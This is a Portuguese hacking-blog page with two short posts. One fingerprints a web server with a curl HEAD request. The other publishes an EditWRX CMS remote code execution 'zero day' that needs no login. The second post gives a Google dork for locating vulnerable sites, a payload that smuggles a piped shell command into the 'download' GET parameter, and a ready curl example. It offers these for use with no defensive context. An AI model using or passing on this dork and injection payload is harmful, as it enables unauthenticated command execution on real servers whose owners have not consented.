Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador curl. Mostrar todas as postagens
Mostrando postagens com marcador curl. Mostrar todas as postagens

quarta-feira, 25 de setembro de 2013

Fingerprint simples via CURL, identificando WEB server.

Fingerprint simples via CURL, identificando WEB server. 

CURL é uma ferramenta linha de comando para manipulações de dados e transferências. Fingerprint simples via CURL, identificando WEB server.

O principal benefício da utilização da interface de linha de comando é que você pode usar tanto Windows ou Linux como shell scripts para automatizar URL e muitos processos relacionados.

Comando:
[[email protected] google]# curl -I www.alvo.gov.br

Tutorial relacionado:
http://curl.haxx.se/docs/httpscripting.html

segunda-feira, 26 de agosto de 2013

EditWRX CMS Executar codico remotamente + Admin Bypass Zero Day!

EditWRX é vulnerável a execução de código remoto através da falta de filtro function
open() no downloader, que pode ler em comandos canalizados na GET "download" Apesar do downloader ser um componente administrativo, O login Não é necessário para executar  a função.


DORK: +inurl:editwrx/wrx.cgi
Exploit: ?download=;uname%20-a| 

Exemplo de uso:
curl "http://sitevull.com/editwrx/wrx.cgi?download=;uname%20-a|"